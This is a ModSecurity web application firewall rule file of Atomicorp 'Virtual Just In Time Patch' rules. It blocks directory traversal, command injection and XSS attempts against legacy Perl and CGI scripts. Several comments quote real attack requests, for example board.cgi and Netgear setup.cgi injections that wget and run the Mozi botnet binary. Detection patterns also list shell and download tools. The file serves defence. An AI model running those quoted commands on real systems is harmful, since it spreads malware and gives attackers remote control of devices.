SecRule REQUEST_URI "/cgiforum\.pl\?thesection=\.\./\.\." "id:310114,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: cgiforum.pl attempt'"
# Rule 310117: cal_make.pl directory traversal attempt
SecRule REQUEST_URI "/cal_make\.pl" "id:310117,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: cal_make.pl directory traversal attempt',chain"
SecRule REQUEST_URI "p0=\.\./\.\./"
# Rule 310119: ustorekeeper.pl directory traversal attempt
SecRule REQUEST_URI "/ustorekeeper\.pl" "id:310119,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ustorekeeper.pl directory traversal attempt',chain"
SecRule REQUEST_URI "file=\.\./\.\./"
# Rule 310121: alibaba.pl arbitrary command execution attempt
SecRule REQUEST_URI "/alibaba\.pl(?:\|7c\||\x7c)" "id:310121,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: alibaba.pl arbitrary command execution attempt'"
# Rule 310128: eshop.pl arbitrary command execution attempt
SecRule REQUEST_URI "/eshop\.pl\?seite=(?:\|3b\|\x3b)" "id:310128,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eshop.pl arbitrary command execution attempt'"
# Rule 310147: story.pl arbitrary file read attempt
SecRule REQUEST_URI "/story\.pl" "id:310147,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: story.pl file access attempt',chain"
SecRule REQUEST_URI "next=\.\./"
# Rule 310181: ftp.pl attempt
SecRule REQUEST_URI "/ftp\.pl\?dir=\.\./\.\." "id:310181,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Talentsoft Web+ source code access attempt'"
# Rule 310204: roads search.pl attempt
SecRule REQUEST_URI "/roads/cgi-bin/search\.pl" "id:310204,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: roads search.pl access attempt',chain"
SecRule REQUEST_URI "form="
# Rule 310208: ans.pl attempt
SecRule REQUEST_URI "/ans.pl\?p=\.\./\.\./" "id:310208,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ans.pl file access attempt'"
# Rule 310254: awstats - local command execution
SecRule REQUEST_URI "/awstats\.pl\?" "chain,id:310254,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: awstats.pl command execution attempt'"
SecRule ARGS:configdir|ARGS:update|ARGS:pluginmode|ARGS:cgi|ARGS:migrate "(?:\||echo|\:system\(|uname)"
# Rule 310255: awstats - local file alteration
SecRule REQUEST_URI "/awstats\.pl\?(?:debug=1|pluginmode=rawlog\&loadplugin=rawlog|update=1\&logfile=\|)" "id:310255,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: awstats.pl local file access attempt'"
# Rule 310256: awstats vulns
SecRule REQUEST_URI "/awstats\.pl\?[^\r\n]*logfile=\|" "id:310256,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: awstats.pl local file access attempt'"
# Rule 310257: awstats vulns
SecRule REQUEST_URI "/awstats\.pl\?configdir=" "id:310257,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: awstats.pl directory traversal attempt'"
# Rule 310259: awstats vulns
SecRule REQUEST_URI "awstats\.pl\?" "chain,id:310259,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: awstats local file system access monkey business attempt'"
SecRule ARGS "(?:debug|configdir|perl|chmod|exec|print|cgi)"
# Rule 310260: yabb
#SecRule REQUEST_URI "/yabb\.pl\?action=usersrecentposts\;username=\<iframe.*javascript\:alert\(\'" # "id:310260,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: YaBB.pl Javascript injection attempt'"
# Rule 310380:E-Data 2.0 XSS
#SecRule REQUEST_URI "cgi-bin/dir\.pl.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310380,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: E-Data dir.pl cross-site-scripting attempt'"
# Rule 310434: CalendarScript path discolsure and XSS
#SecRule REQUEST_URI "/calendar\.pl\?calendar=.*&template=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310434,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CalendarScript calendar.pl cross-site-scripting attempt'"
# Rule 310435: CalendarScript path discolsure and XSS
#SecRule REQUEST_URI "/calendar\.pl\?calendar=.*&command=login&username=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310435,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CalendarScript calendar.pl cross-site-scripting attempt'"
# Rule 310019: formmail probe
SecRule REQUEST_URI|REQUEST_BODY "^/formmail\.pl$" "id:310498,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Formmail probe'"
# Rule 310019: quizz.pl exploit
SecRule REQUEST_URI "quizz\.pl/ask/\;" "id:390043,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: quizz.pl exploit'"
SecMarker END_PERL_JITP
#.form
SecRule REQUEST_FILENAME "\.form$" "id:332875,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309209,t:none,pass,nolog,noauditlog,skipAfter:END_FORM_JITP"
SecRule REQUEST_URI "saveserializeddefinition\.form" "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:391653,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible OpenMRS Remote code injection '"
SecRule ARGS:serializedData "(?:<|>)" "t:none,t:urlDecodeUni"
SecMarker END_FORM_JITP
#CGI applications
SecRule REQUEST_URI "cgi-bin/" "id:330877,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:307020,t:none,pass,nolog,noauditlog,skipAfter:END_CGI_2_JITP"
SecRule REQUEST_URI "/kerbynet" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:312657,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: kerbynet command injection blocked'"
SecRule ARGS:type "(?:\*|\;)" "t:none,t:urlDecodeUni"
SecMarker END_CGI_2_JITP
#CGI applications
SecRule REQUEST_FILENAME "(?:\.cgi|cgi-|fcgi)$" "id:333875,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309009,t:none,pass,nolog,noauditlog,skipAfter:END_CGI_JITP"
#/board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://901.298.356.456:42575/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
SecRule REQUEST_URI "/board\.cgi" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:312608,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: board.cgi command injection blocked'"
SecRule ARGS:cmd "(?:cd|wget|curl)" "t:none,t:urlDecodeUni,t:lowercase"
#/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://wheverver/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
SecRule REQUEST_URI "/setup\.cgi" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:312668,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: setup.cgi command injection blocked'"
SecRule ARGS:todo "syscmd" "chain,t:none,t:urlDecodeUni,t:lowercase"
SecRule ARGS:cmd "\;" "t:none,t:urlDecodeUni"
SecRule REQUEST_URI "/tmunblock\.cgi" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:312658,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Cisco tmunblock.cgi command injection blocked'"
SecRule ARGS:ttcp_ip "\`" "t:none,t:urlDecodeUni"
SecRule REQUEST_URI "/weblogin\.cgi" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:312659,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: weblogin.cgi command injection blocked'"
SecRule ARGS:username|ARGS:password "\'" "t:none,t:urlDecodeUni"
#wget "http://www.atomicorp.com//builder/login.php?shopname=&action=lostpw&email=&redirect=%20;%20x%20%7C%7C%20sleep%203%20%26"
#http://www.atomicorp.com//builder/login.php?shopname=&action=lostpw&email=&redirect= ;%2<><32> || sleep 3 &
#TODO
SecRule ARGS "\;.{1,8} \|\| " "phase:2,log,deny,status:403,auditlog,t:none,t:utf8toUnicode,t:urlDecodeUni,t:compressWhiteSpace,id:392658,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CGI command injection blocked'"
#login.cgi?cli=aa aa';wget
SecRule REQUEST_URI "/login\.f?cgi" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:392657,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: login.cgi command injection blocked'"
SecRule ARGS:cli "'"
#commerce.cgi XSS vulnerability
SecRule REQUEST_URI "/commerce\.f?cgi" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:390653,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible XSS injection in ecommerce CGI'"
SecRule ARGS:page|ARGS:/com_/ "(?:<|>|script)"
# Rule 310001: pals-cgi arbitrary file access attempt
SecRule REQUEST_URI "/pals-cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:310001,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: pals-cgi arbitary file access attempt'"
SecRule REQUEST_URI "documentname="
# Rule 310005: cssearch.cgi arbitrary command execution attempt
SecRule REQUEST_URI "/cssearch\.f?cgi\?" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310005,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: cssearch.cgi arbitrary command execution attempt',chain"
SecRule REQUEST_URI "('|`)"
# Rule 310006: FormHandler.cgi directory traversal attempt attempt
SecRule REQUEST_URI "/formhandler\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310006,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: FormHandler.cgi directory traversal attempt attempt',chain"
SecRule REQUEST_URI "/\.\./"
# Rule 310007: FormHandler.cgi external site redirection attempt
SecRule REQUEST_URI "/formhandler\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310007,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: FormHandler.cgi external site redirection attempt',chain"
SecRule ARGS:redirect "http"
# Rule 310017: dcforum.cgi directory traversal attempt
SecRule REQUEST_URI "/dcforum\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310017,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: dcforum.cgi directory traversal attempt',chain"
SecRule ARGS:forum "\.\./\.\."
# Rule 310018: dcboard.cgi invalid user addition attempt
#SecRule REQUEST_URI "/dcboard\.f?cgi.*\|admin" # "id:310018,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: dcboard.cgi invalid user addition attempt'"
# Rule 310024: Home Free search.cgi directory traversal attempt
SecRule REQUEST_URI "/search\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310024,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Home Free search.cgi directory traversal attempt',chain"
SecRule ARGS:letter "\.\./\.\."
# Rule 310026: pfdispaly.cgi arbitrary command execution attempt
SecRule REQUEST_URI "/pfdispaly\.f?cgi\?\'" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310026,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: pfdispaly.cgi arbitrary command execution attempt'"
# Rule 310027: talkback.cgi directory traversal attempt
SecRule REQUEST_URI "/talkbalk\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310027,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: talkback.cgi directory traversal attempt',chain"
SecRule ARGS:article "\.\./\.\./"
# Rule 310028: technote main.cgi file directory traversal attempt
SecRule REQUEST_URI "/technote/main\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310028,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: technote main.cgi file directory traversal attempt',chain"
SecRule REQUEST_URI "\.\./\.\./"
# Rule 310029: technote print.cgi directory traversal attempt
SecRule REQUEST_URI "/technote/print\.f?cgi" "chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310029,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: technote print.cgi directory traversal attempt'"
SecRule REQUEST_URI "\x00"
# Rule 310030: eXtropia webstore directory traversal
SecRule REQUEST_URI "/web_store\.f?cgi" "id:310030,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eXtropia webstore directory traversal',chain"
SecRule ARGS:page "\.\./"
# Rule 310031: shopping cart directory traversal
SecRule REQUEST_URI "/shop\.f?cgi" "id:310031,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: shopping cart directory traversal',chain"
SecRule ARGS:page "\.\./"
# Rule 310032: Allaire Pro Web Shell attempt
SecRule REQUEST_URI "/authenticate\.f?cgi\?password" "id:310032,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Allaire Pro Web Shell attempt',chain"
SecRule REQUEST_URI "config\.ini"
# Rule 310033: Armada Style Master Index directory traversal
SecRule REQUEST_URI "/search\.f?cgi\?keys" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310033,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Armada Style Master Index directory traversal',chain"
SecRule ARGS:catigory|ARGS:catgeory "\.\./"
# Rule 310034: cached_feed.cgi moreover shopping cart directory
# traversal
SecRule REQUEST_URI "/cached_feed\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310034,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: cached_feed.cgi moreover shopping cart directory traversal',chain"
SecRule REQUEST_URI "\.\./"
# Rule 310035: Talentsoft Web+ exploit attempt
SecRule REQUEST_URI "/webplus\.f?cgi\?Script=/webplus/webping/webping\.wml" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310035,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Talentsoft Web+ exploit attempt'"
# Rule 310036: txt2html.cgi directory traversal attempt
SecRule REQUEST_URI "/txt2html\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310036,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: txt2html.cgi directory traversal attempt',chain"
SecRule REQUEST_URI "\.\./\.\./"
# Rule 310037: store.cgi directory traversal attempt
SecRule REQUEST_URI "/store\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310037,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: store.cgi directory traversal attempt',chain"
SecRule REQUEST_URI "\.\./"
# Rule 310038: mrtg.cgi directory traversal attempt
SecRule REQUEST_URI "/mrtg\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310038,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mrtg.cgi directory traversal attempt',chain"
SecRule ARGS:cfg "/\.\./"
# Rule 310039: CCBill whereami.cgi arbitrary command execution attempt
SecRule REQUEST_URI "/whereami\.f?cgi\?g=" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310039,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CCBill whereami.cgi arbitrary command execution attempt'"
# Rule 310040: WhatsUpGold instancename overflow attempt
SecRule REQUEST_URI "/_maincfgret\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310040,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WhatsUpGold instancename overflow attempt'"
# Rule 310095: HyperSeek hsx.cgi directory traversal attempt
#SecRule REQUEST_URI "/hsx\.f?cgi.*(\x00a|\.\./\.\.)" # "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310095,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: HyperSeek hsx.cgi directory traversal attempt'"
# Rule 310096: SWSoft ASPSeek Overflow attempt
#SecRule REQUEST_URI "/s\.f?cgi.*tmp=" # "id:310096,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SWSoft ASPSeek Overflow attempt'"
# Rule 310109: wayboard attempt
SecRule REQUEST_URI "/way-board/way-board\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310109,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: wayboard attempt',chain"
SecRule REQUEST_URI "\.\./\.\."
# Rule 310110: commerce.cgi arbitrary file access attempt
SecRule REQUEST_URI "/commerce\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310110,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: commerce.cgi arbitrary file access attempt',chain"
SecRule REQUEST_URI "/\.\./"
# Rule 310112: webspirs.cgi directory traversal attempt
SecRule REQUEST_URI "/webspirs\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310112,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: webspirs.cgi directory traversal attempt',chain"
SecRule REQUEST_URI "\.\./\.\./"
# Rule 310113: auktion.cgi directory traversal attempt
SecRule REQUEST_URI "/auktion\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310113,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auktion.cgi directory traversal attempt',chain"
SecRule ARGS:menue|ARGS:menu "\.\./\.\./"
# Rule 310115: directorypro.cgi attempt
SecRule REQUEST_URI "/directorypro\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310115,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: directorypro.cgi attempt',chain"
SecRule REQUEST_URI "\.\./\.\."
# Rule 310116: Web Shopper shopper.cgi attempt
SecRule REQUEST_URI "/shopper\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310116,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Web Shopper shopper.cgi attempt',chain"
SecRule ARGS:newpage "\.\./"
# Rule 310118: ttawebtop.cgi arbitrary file attempt
SecRule REQUEST_URI "/ttawebtop\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310118,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ttawebtop.cgi arbitrary file attempt',chain"
SecRule ARGS:pg "\.\./"
# Rule 310127: cssearch.cgi arbitrary command execution attempt
SecRule REQUEST_URI "/cssearch\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310127,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: cssearch.cgi arbitrary command execution attempt',chain"
SecRule REQUEST_URI "(\`|')"
# Rule 310129: loadpage.cgi directory traversal attempt
SecRule REQUEST_URI "/loadpage\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310129,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: loadpage.cgi directory traversal attempt',chain"
SecRule ARGS:file "\.\./"
# Rule 310130: faqmanager.cgi arbitrary file access attempt
SecRule REQUEST_URI "/faqmanager\.f?cgi\?toc=" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310130,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: faqmanager.cgi arbitrary file attempt',chain"
SecRule REQUEST_URI "(?:cd|\;|perl|python|rpm|yum|apt-get|emerge|lynx|links|mkdir|elinks|cmd|pwd|(?:w|ftp)get|lwp-(?:download|request|mirror|rget)|id|uname|cvs|svn|(?:s|r)(?:cp|sh)|rexec|smbclient|t?ftp|ncftp|curl|telnet|gcc|cc|g\+\+|\./)"
# Rule 310131: Home Free search.cgi directory traversal attempt
SecRule REQUEST_URI "/search\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310131,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Home Free search.cgi directory traversal attempt',chain"
SecRule ARGS:letter "\.\./\.\."
# Rule 310132: pfdisplay.cgi arbitrary command execution attempt
SecRule REQUEST_URI "/pfdisplay\.f?cgi\?'" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310132,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: pfdisplay.cgi arbitrary command execution attempt'"
# Rule 310133: pagelog.cgi directory traversal attempt
SecRule REQUEST_URI "/pagelog\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310133,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: pagelog.cgi directory traversal attempt',chain"
SecRule ARGS:name "\.\./"
# Rule 310134: talkback.cgi directory traversal attempt
SecRule REQUEST_URI "/talkbalk\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310134,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: pagelog.cgi directory traversal attempt',chain"
SecRule ARGS:article "\.\./\.\./"
# Rule 310135: emumail.cgi NULL attempt
SecRule REQUEST_URI "/emumail\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:310135,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: emumail.cgi NULL attempt'"
SecRule REQUEST_URI "\x00"
# Rule 310136: technote main.cgi directory traversal attempt
SecRule REQUEST_URI "/technote/main\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310136,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: technote main.cgi directory traversal attempt',chain"
SecRule REQUEST_URI "\.\./\.\./"
# Rule 310137: technote print.cgi directory traversal attempt
SecRule REQUEST_URI "/technote/print\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:310137,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: technote print.cgi directory traversal attempt'"
SecRule REQUEST_URI "\x00"
# Rule 310138: Allaire Pro Web Shell attempt
SecRule REQUEST_URI "/authenticate.f?cgi\?password" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310138,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Allaire Pro authenticate.cgi shell attempt',chain"
SecRule REQUEST_URI "config\.ini"
# Rule 310139: Armada Style Master Index directory traversal
SecRule REQUEST_URI "/search\.cgi\?keys" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310139,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Armada Style Master search.cgi directory traversal attempt',chain"
SecRule ARGS:catigory|ARGS:category "\.\./"
# Rule 310140: cached_feed.cgi moreover shopping cart directory
# traversal
SecRule REQUEST_URI "/cached_feed\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310140,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Moreover cached_feed.cgi directory traversal attempt',chain"
SecRule REQUEST_URI "\.\./"
# Rule 310141: Talentsoft Web+ exploit attempt
SecRule REQUEST_URI "/webplus.f?cgi\?script=/webplus/webping/webping\.wml" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310141,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Talentsoft Web+ exploit attempt'"
# Rule 310142: bizdbsearch attempt
SecRule REQUEST_URI "/bizdb1-search\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310142,rev:1,severity:3,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Bizdbsearch bizdb1-search.cgi mail attempt',chain"
SecRule REQUEST_URI "mail"
# Rule 310143: sojourn.cgi File access attempt
SecRule REQUEST_URI "/sojourn\.f?cgi\?cat" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:310143,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: sojourn.cgi file access attempt'"
SecRule REQUEST_URI "\x00"
# Rule 310144: SGI Infosearch fname attempt
SecRule REQUEST_URI "/infosrch\.f?cgi\?" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310144,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: infosrch.cgi fname attempt',chain"
SecRule REQUEST_URI "fname="
# Rule 310145: store.cgi directory traversal attempt
SecRule REQUEST_URI "/store\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310145,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: store.cgi directory traversal attempt',chain"
SecRule REQUEST_URI "\.\./"
# Rule 310146: SIX webboard generate.cgi file access attempt
SecRule REQUEST_URI "/generate\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310146,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: generate.cgi file access attempt',chain"
SecRule REQUEST_URI "content=\.\./"
# Rule 310148: mrtg.cgi directory traversal attempt
SecRule REQUEST_URI "/mrtg\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310148,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mrtg.cgi directory traversal attempt',chain"
SecRule REQUEST_URI "cfg=/\.\./"
# Rule 310149:alienform.cgi directory traversal attempt
#SecRule REQUEST_URI "/alienform\.f?cgi.*\.\|7c\|\./\.\|7c\|\." # "id:310149,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: alienform.cgi directory traversal attempt',chain"
#SecRule REQUEST_URI "/af\.f?cgi.*\.\|7c\|\./\.\|7c\|\."
# Rule 310150: CCBill whereami.cgi arbitrary command execution attempt
SecRule REQUEST_URI "/whereami\.f?cgi\?g=" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310150,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CCbill whereami.cgi command execution attempt'"
# Rule 310151: MDaemon form2raw.cgi overflow attempt
SecRule REQUEST_URI "/form2raw\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310151,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MDaemon form2raw.cgi overflow attempt'"
# Rule 310152: WhatsUpGold instancename overflow attempt
SecRule REQUEST_URI "/_maincfgret\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310152,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WhatsUpGold _maincfgret.cgi overflow attempt'"
# Rule 310213: book.cgi arbitrary command execution attempt
